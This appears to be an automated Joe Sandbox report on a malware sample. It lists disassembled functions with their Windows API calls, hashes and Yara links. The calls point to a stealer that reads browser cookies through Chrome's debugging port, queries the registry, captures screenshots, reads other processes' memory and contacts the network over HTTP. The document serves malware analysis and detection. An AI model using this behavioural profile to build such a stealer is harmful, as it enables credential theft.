Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Internetlstrcat$CloseFileHandleRead$memcmpmemcpymemsetstrlen
String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
API String ID: 1951979638-4155744131
Opcode ID: 5d9a63772d8fc80b55ca352ee1af688ab2a6bdb05e2b97055c5b68e1efb0ed4b
Instruction ID: cb497cd3caf05907a7207c2bc0cb865dc1d22c80e8fc0a0c68342ace2b668139
Opcode Fuzzy Hash: 5d9a63772d8fc80b55ca352ee1af688ab2a6bdb05e2b97055c5b68e1efb0ed4b
Instruction Fuzzy Hash: F2A135B49003549BDB01EF34DC81BAA77B9BF42308F00542DE491677D2DBB8AAC6CB95

Function 0080130C Relevance: 21.1, APIs: 14, Instructions: 129stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00801332
memset.MSVCRT ref: 0080133F
lstrcat.KERNEL32(?,004315C9), ref: 00801366
lstrcat.KERNEL32(?,004315CC), ref: 0080138B
lstrcat.KERNEL32(?,004315CF), ref: 008013B0
lstrcat.KERNEL32(?,004315D2), ref: 008013D5
lstrcat.KERNEL32(?,004315D8), ref: 00801429
lstrcat.KERNEL32(?,004315DB), ref: 0080144E
lstrcat.KERNEL32(?,004315DE), ref: 00801473
lstrcat.KERNEL32(?,004315E1), ref: 00801498
lstrcat.KERNEL32(?,004315E7), ref: 008014E6
strcmp.MSVCRT ref: 008014F3
strcmp.MSVCRT ref: 00801506
ExitProcess.KERNEL32 ref: 0080151F

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrcat$memsetstrcmp$ExitProcess
String ID:
API String ID: 3817037828-0
Opcode ID: abc8560da33bf2fb35fd7676998d50ed9d1deec662aada542982aacc3b18bb14
Instruction ID: 2654a93cc29e42df0ece27620d07c6ba1700aa3f55e55aada9d918f7cbbad72b
Opcode Fuzzy Hash: abc8560da33bf2fb35fd7676998d50ed9d1deec662aada542982aacc3b18bb14
Instruction Fuzzy Hash: F841C7209042807ADB22D761ED8DB993EAAEFD6718F443079F443951F1DBAD0589C37E

Function 008144EE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 169registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00813975: lstrcpy.KERNEL32(00000000,?), ref: 00813999

RegOpenKeyExA.ADVAPI32(?,00000000,00020019,0042EEFC), ref: 00814532
RegEnumKeyExA.ADVAPI32 ref: 00814573
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019), ref: 008145DB
RegQueryValueExA.ADVAPI32(?,00000000,?,?,?), ref: 00814608
lstrlen.KERNEL32(?), ref: 0081461F
RegQueryValueExA.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,0064403B), ref: 008146B6
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00644040), ref: 0081472D
RegEnumKeyExA.ADVAPI32 ref: 00814759
RegCloseKey.ADVAPI32 ref: 0081476D
RegCloseKey.ADVAPI32(00000000), ref: 00814777

Strings

?, xrefs: 00814516

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Close$EnumOpenQueryValue$lstrcpylstrlen
String ID: ?
API String ID: 2954784806-1684325040
Opcode ID: af859ca9dc6edd80a9ec9f16aa9c02abffaa3d524dfc5d6bcc5b65d79d611d53
Instruction ID: 94017c3ea3d85cff72f53620eba9148e3ca9cecbd0103b3a9faeebd52e6b46fd
Opcode Fuzzy Hash: af859ca9dc6edd80a9ec9f16aa9c02abffaa3d524dfc5d6bcc5b65d79d611d53
Instruction Fuzzy Hash: D261AD31208344AFD321AF64DC46FAEBBE9FF86748F00690DF68493151DB745A89CB52

Function 00814EFD Relevance: 18.2, APIs: 12, Instructions: 159COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00814F36
GetDesktopWindow.USER32 ref: 00814F40
GetWindowRect.USER32(00000000,?), ref: 00814F4D
SelectObject.GDI32(00000000,00000000), ref: 00814F7D
GetHGlobalFromStream.COMBASE(?,?), ref: 00815019
GlobalLock.KERNEL32(?), ref: 00815021
GlobalSize.KERNEL32(?), ref: 00815037
SelectObject.GDI32(?,?), ref: 0081509D
DeleteObject.GDI32(?), ref: 008150B8
DeleteObject.GDI32(?), ref: 008150BF
ReleaseDC.USER32(?,?), ref: 008150CC
CloseWindow.USER32(?), ref: 008150D3

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: GlobalObject$Window$DeleteSelectStream$CloseCreateDesktopFromLockRectReleaseSize
String ID:
API String ID: 3547074919-0
Opcode ID: 786feabe4aac4ce43d01109e92d56cb5fec2791526f4185d5024407780f808c1
Instruction ID: c3350958ba8310b555db8746f7a52299022391b333c9846b4b1851e43e3d8451
Opcode Fuzzy Hash: 786feabe4aac4ce43d01109e92d56cb5fec2791526f4185d5024407780f808c1
Instruction Fuzzy Hash: 1D514D75900219AFCF01DFA4DC4AEEEBBB9FF0A310B005119F901E3161EB70AA59CB61

Function 00811539 Relevance: 17.0, APIs: 11, Instructions: 496stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00813975: lstrcpy.KERNEL32(00000000,?), ref: 00813999

strtok_s.MSVCRT ref: 0081165B
GetProcessHeap.KERNEL32(0042EEFC,0042EEFC,0042EEFC,0042EEFC,?,00000028,0042EEFC), ref: 00811694
lstrlen.KERNEL32(00000000), ref: 008116EE
lstrlen.KERNEL32(00000000), ref: 0081174F
lstrlen.KERNEL32(00000000), ref: 008117B1
lstrlen.KERNEL32(00000000), ref: 00811843

Part of subcall function 008153D7: malloc.MSVCRT ref: 008153E8

Part of subcall function 00813A27: lstrcpy.KERNEL32(00000000), ref: 00813A5F

Part of subcall function 0080B19F: lstrlen.KERNEL32(?,00000000,?,00000000,?,?,0080882B,00000000,?,?,?,?,?,?,?), ref: 0080B1AD
Part of subcall function 0080B19F: LocalAlloc.KERNEL32(00000040,00000000,?,0080882B,00000000,?,?,?,?,?,?,?), ref: 0080B1D8

lstrcat.KERNEL32(?,00643BBD), ref: 00811A34
lstrcat.KERNEL32(?,00643BBD), ref: 00811A92
lstrcat.KERNEL32(?,00643BBD), ref: 00811A9A
strtok_s.MSVCRT ref: 00811AD4

Part of subcall function 008139DF: lstrlen.KERNEL32(00000000,?,?,0080883E,0042EEFC,00000000,?,?,?,?,?,?,?), ref: 008139E8
Part of subcall function 008139DF: lstrcpy.KERNEL32(00000000,00000000), ref: 00813A19

Part of subcall function 00813AC7: lstrlen.KERNEL32(?,?,?,?,?,00801847,?,0042EEFC), ref: 00813AE0
Part of subcall function 00813AC7: lstrcpy.KERNEL32(00000000,00000000), ref: 00813B09
Part of subcall function 00813AC7: lstrcat.KERNEL32(00000000,?), ref: 00813B11

lstrlen.KERNEL32(?), ref: 00811AF2

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy$strtok_s$AllocHeapLocalProcessmalloc
String ID:
API String ID: 2997608458-0
Opcode ID: a68134cb651d9ddd32a15a0d10eae0307fd36d674900b40827a4ca3a86a29651
Instruction ID: 3276455056331769a32119eddc2ad730cc2434e454ab4656e2853b83e2a254d4
Opcode Fuzzy Hash: a68134cb651d9ddd32a15a0d10eae0307fd36d674900b40827a4ca3a86a29651
Instruction Fuzzy Hash: A812C434A006A59ACF01EB68DC86BEE7B7EFF56310F041119F501A7292DFB45B86CB52

Function 0041F76E Relevance: 16.7, APIs: 11, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F77F
GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F7C3
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7DF
ReadFile.KERNEL32(?,?,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7F9
SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F800
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F810
SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F835
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F849
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F8D7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F8F6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F919

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: File$PointerReadUnothrow_t@std@@@__ehfuncinfo$??2@$HandleInformationSize
String ID:
API String ID: 998994793-0
Opcode ID: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
Instruction ID: ddda595af80ec950f864e733dfaf86c15ba5cdc8ff8ff1ee9bb0ea447fc4cfe9
Opcode Fuzzy Hash: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
Instruction Fuzzy Hash: A6515771604305AFD724DF16C884EABBBE8FFC4714F50492EF58997201D734A84ACBA9

Function 00818C08 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 263registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00818C2A
RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?), ref: 00818C47
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?), ref: 00818C61

Part of subcall function 008139A7: lstrcpy.KERNEL32(00000000), ref: 008139CA

Part of subcall function 00818952: FindFirstFileA.KERNEL32(?,?), ref: 008189A7
Part of subcall function 00818952: lstrcat.KERNEL32(?,?), ref: 00818A6B
Part of subcall function 00818952: lstrcat.KERNEL32(?), ref: 00818A78
Part of subcall function 00818952: lstrcat.KERNEL32(?,?), ref: 00818A86
Part of subcall function 00818952: lstrcat.KERNEL32(?,?), ref: 00818A93
Part of subcall function 00818952: lstrcat.KERNEL32(?,?), ref: 00818ACD

Part of subcall function 00818952: FindNextFileA.KERNEL32(00000000,?), ref: 00818BB6
Part of subcall function 00818952: FindClose.KERNEL32(00000000), ref: 00818BC5

RegCloseKey.ADVAPI32(?), ref: 00818C6A
lstrcat.KERNEL32(?,?), ref: 00818C84
lstrcat.KERNEL32(?), ref: 00818C91

Strings

X6c, xrefs: 00818EDE
@6c, xrefs: 00818E70
"6c, xrefs: 00818E01

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$CloseFile$FirstNextOpenQueryValuelstrcpymemset
String ID: "6c$@6c$X6c
API String ID: 358504995-2427117290
Opcode ID: ce8f7ae3a830e0298fbfe742e94f4418e49632205cfaafa19303167fb0e32543
Instruction ID: f07db395375a6f4a56c0a8ed5e1381926fc33ae44c995ae6d2dd865cb5aa4012
Opcode Fuzzy Hash: ce8f7ae3a830e0298fbfe742e94f4418e49632205cfaafa19303167fb0e32543
Instruction Fuzzy Hash: 45C13271D007489ADF01EFA8C9828FE77B9FF5D304B009259ED45AA117EB30AAD5CB91

Function 00808A6E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 199networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008139A7: lstrcpy.KERNEL32(00000000), ref: 008139CA

Part of subcall function 00806E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,00806F0F,?,?,?,?), ref: 00806E7A
Part of subcall function 00806E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?), ref: 00806E86
Part of subcall function 00806E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,?), ref: 00806E92

Part of subcall function 00813975: lstrcpy.KERNEL32(00000000,?), ref: 00813999

StrCmpCA.SHLWAPI(?), ref: 00808AEA
InternetConnectA.WININET ref: 00808B23
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00808B9B
HttpSendRequestA.WININET ref: 00808BAF
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00808BC7
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00808BFF
InternetCloseHandle.WININET(00000000), ref: 00808C95
InternetCloseHandle.WININET(00000000), ref: 00808D03

Strings

p7c, xrefs: 00808B4A, 00808B73

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttplstrcpy$ConnectFileInfoOptionQueryReadRequestSend
String ID: p7c
API String ID: 4244444472-4010549652
Opcode ID: 22e25e8e46289607b9d5628619eb8ac4b8640834c60657c462aab1fc5886c734
Instruction ID: 20f53c25fb4d59c295bacd05b3fcfc58e5ba7f3ffb8863640669ffe3eb897dda
Opcode Fuzzy Hash: 22e25e8e46289607b9d5628619eb8ac4b8640834c60657c462aab1fc5886c734
Instruction Fuzzy Hash: A971F071A00259DEEB50DF64DC46BEEBBB9FF85304F00511CF845AB291DB709A85CBA1

Function 0080ADF6 Relevance: 15.2, APIs: 10, Instructions: 191stringsleepprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0080AE10
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 0080AE7F
CreateDesktopA.USER32 ref: 0080AEA3
memset.MSVCRT ref: 0080AEBA
lstrcat.KERNEL32(?,?), ref: 0080AEC6
lstrcat.KERNEL32(?,?), ref: 0080AED0
memset.MSVCRT ref: 0080AF0A
CreateProcessA.KERNEL32 ref: 0080AFDB
Sleep.KERNEL32(00001388), ref: 0080AFEE

Part of subcall function 008139A7: lstrcpy.KERNEL32(00000000), ref: 008139CA

Part of subcall function 0080AA28: memset.MSVCRT ref: 0080AAFC

Part of subcall function 008155A9: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008155BF
Part of subcall function 008155A9: Process32First.KERNEL32(00000000,?), ref: 008155C9
Part of subcall function 008155A9: Process32Next.KERNEL32(00000000,?), ref: 008155D5
Part of subcall function 008155A9: OpenProcess.KERNEL32(00000001,00000000,?), ref: 008155F9
Part of subcall function 008155A9: TerminateProcess.KERNEL32(00000000,00000000), ref: 00815608
Part of subcall function 008155A9: CloseHandle.KERNEL32(00000000), ref: 0081560F
Part of subcall function 008155A9: Process32Next.KERNEL32(00000000,?), ref: 00815617
Part of subcall function 008155A9: CloseHandle.KERNEL32(00000000), ref: 00815622

CloseDesktop.USER32(?), ref: 0080B0A2

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: memset$CloseCreateDesktopProcessProcess32$HandleNextOpenlstrcat$FirstSleepSnapshotTerminateToolhelp32lstrcpy
String ID:
API String ID: 2291945429-0
Opcode ID: 0d6afacdb9a6ceaea191d692fe4955dc14e1571e053833d46d2c99cb42a5a63d
Instruction ID: 1c6f4a336f603b7b1481e9fc9c41bf7d51f99d76f55b602e45ee04c85db5bbc9
Opcode Fuzzy Hash: 0d6afacdb9a6ceaea191d692fe4955dc14e1571e053833d46d2c99cb42a5a63d
Instruction Fuzzy Hash: F881C331C00799DADB11EF64DC46BD9BBB5FF56304F009259F984A6152EB70A7C4CB82

Function 00818F80 Relevance: 13.8, APIs: 9, Instructions: 267stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00818F9C
memset.MSVCRT ref: 00818FAD

Part of subcall function 00814D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00814D7F

lstrcat.KERNEL32(?), ref: 00818FEB
lstrcat.KERNEL32(?,?), ref: 00818FF9
lstrcat.KERNEL32(?), ref: 00819006

Part of subcall function 00813975: lstrcpy.KERNEL32(00000000,?), ref: 00813999

Part of subcall function 008139A7: lstrcpy.KERNEL32(00000000), ref: 008139CA

Part of subcall function 0080B0D4: GetFileSizeEx.KERNEL32(00000000,?), ref: 0080B11C
Part of subcall function 0080B0D4: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0080B13F
Part of subcall function 0080B0D4: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0080B160
Part of subcall function 0080B0D4: CloseHandle.KERNEL32(00000000), ref: 0080B186

Part of subcall function 00815202: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,00819104,?,?,?), ref: 0081520D

StrStrA.SHLWAPI(00000000,?,?,?), ref: 0081910D
GlobalFree.KERNEL32(00000000), ref: 0081928E

Part of subcall function 0080B19F: lstrlen.KERNEL32(?,00000000,?,00000000,?,?,0080882B,00000000,?,?,?,?,?,?,?), ref: 0080B1AD
Part of subcall function 0080B19F: LocalAlloc.KERNEL32(00000040,00000000,?,0080882B,00000000,?,?,?,?,?,?,?), ref: 0080B1D8

StrCmpCA.SHLWAPI(?,0042EEFC), ref: 00819238
lstrcat.KERNEL32(?,-0000000C), ref: 0081924A

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrcat$Alloc$FileGlobalLocallstrcpymemset$CloseFolderFreeHandlePathReadSizelstrlen
String ID:
API String ID: 652918382-0
Opcode ID: ffb8687492f831870c222a0275bad59cdba76b2a70563ac4df95714154973f44
Instruction ID: a04836f668fec2238a6f2411d1e05ac005a54d09216330af55f9a3d2e6f19564
Opcode Fuzzy Hash: ffb8687492f831870c222a0275bad59cdba76b2a70563ac4df95714154973f44
Instruction Fuzzy Hash: 5AB17C71D007599BCF10EFA8CC829EE7BB9FF49300F005559E955E7252EB30AA89CB91

Function 0081F9D5 Relevance: 13.7, APIs: 9, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0081FE13), ref: 0081F9E6
GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0081FE13), ref: 0081FA2A
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0081FA46
SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0081FA67
SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0081FA9C
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0081FAB0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0081FB3E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0081FB5D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0081FB80

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: File$PointerUnothrow_t@std@@@__ehfuncinfo$??2@$HandleInformationReadSize
String ID:
API String ID: 4184024484-0
Opcode ID: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
Instruction ID: 603dd44eb1cc52759cbf3fee429df47505239055be6103afd8204c24bbd9243b
Opcode Fuzzy Hash: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
Instruction Fuzzy Hash: A4514971208345ABD724CF19C894EABBBE8FFC4718F55482DFA89D7212D734A845CBA1

Function 0041F51E Relevance: 13.6, APIs: 9, Instructions: 105stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00010000,?,004200FB,?), ref: 0041F526
StrCmpCA.SHLWAPI(?,00645128), ref: 0041F570
StrCmpCA.SHLWAPI(?,0064512C), ref: 0041F5A7
StrCmpCA.SHLWAPI(?,00645134), ref: 0041F5DC
StrCmpCA.SHLWAPI(?,0064513C), ref: 0041F611
StrCmpCA.SHLWAPI(?,00645144), ref: 0041F646
StrCmpCA.SHLWAPI(?,0064514C), ref: 0041F67B
StrCmpCA.SHLWAPI(?,00645154), ref: 0041F6A5
StrCmpCA.SHLWAPI(?,0064515C), ref: 0041F6D6

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
Instruction ID: b1bc6718bd93d0afd4b9143767effb8c204e4d7c234b08edbe8f1f012b2e33c7
Opcode Fuzzy Hash: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
Instruction Fuzzy Hash: 8A413078345BD16BEB319B24AD5839B3E97575370CF48207AE042972A3D3FC448B8759

Function 0081F785 Relevance: 13.6, APIs: 9, Instructions: 105stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00010000,?,00820362,?), ref: 0081F78D
StrCmpCA.SHLWAPI(?,00645128), ref: 0081F7D7
StrCmpCA.SHLWAPI(?,0064512C), ref: 0081F80E
StrCmpCA.SHLWAPI(?,00645134), ref: 0081F843
StrCmpCA.SHLWAPI(?,0064513C), ref: 0081F878
StrCmpCA.SHLWAPI(?,00645144), ref: 0081F8AD
StrCmpCA.SHLWAPI(?,0064514C), ref: 0081F8E2
StrCmpCA.SHLWAPI(?,00645154), ref: 0081F90C
StrCmpCA.SHLWAPI(?,0064515C), ref: 0081F93D

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
Instruction ID: 20b890d9864d9750258a2938f77cdc678fa1c86989a3f0a6e9a0887ab22d67cc
Opcode Fuzzy Hash: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
Instruction Fuzzy Hash: 20415078654BC46FEB31AB24AD487963E9FAB23318F582078E582D71A3C3F84489C755

Function 008135AC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 008135C9
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 008135ED
memset.MSVCRT ref: 00813614
ReadProcessMemory.KERNEL32(000000FF,00000000,?,00000208,00000000,??d,00643F3F,-00000208,?,000000FF,00000FFF,?,?), ref: 008136C3
??_V@YAXPAX@Z.MSVCRT(00000000,??d,00643F3F,00000000,00000000,000000FF,00000FFF,00000000,?), ref: 00813741

Strings

??d, xrefs: 00813688

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Process$MemoryOpenReadmemset
String ID: ??d
API String ID: 960838850-3262641346
Opcode ID: 89e6c9af5f48b8ed443eb51b86c866745eb1c3a28019441fa6cceb2bf1d7dc79
Instruction ID: 3489dfd17686df33e0a97d11f7b9b23f71ac7af3b5c10d5bab778f9f665a483b
Opcode Fuzzy Hash: 89e6c9af5f48b8ed443eb51b86c866745eb1c3a28019441fa6cceb2bf1d7dc79
Instruction Fuzzy Hash: B351EDB1508354ABDB20DF24EC44B9B7BE9FF96714F00092DF884DB282D3719A4997A3

Function 00408695 Relevance: 12.1, APIs: 8, Instructions: 120networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763

Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A

InternetOpenA.WININET ref: 004086E6
StrCmpCA.SHLWAPI(?), ref: 004086FB
CreateFileA.KERNEL32 ref: 0040875D
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00408772
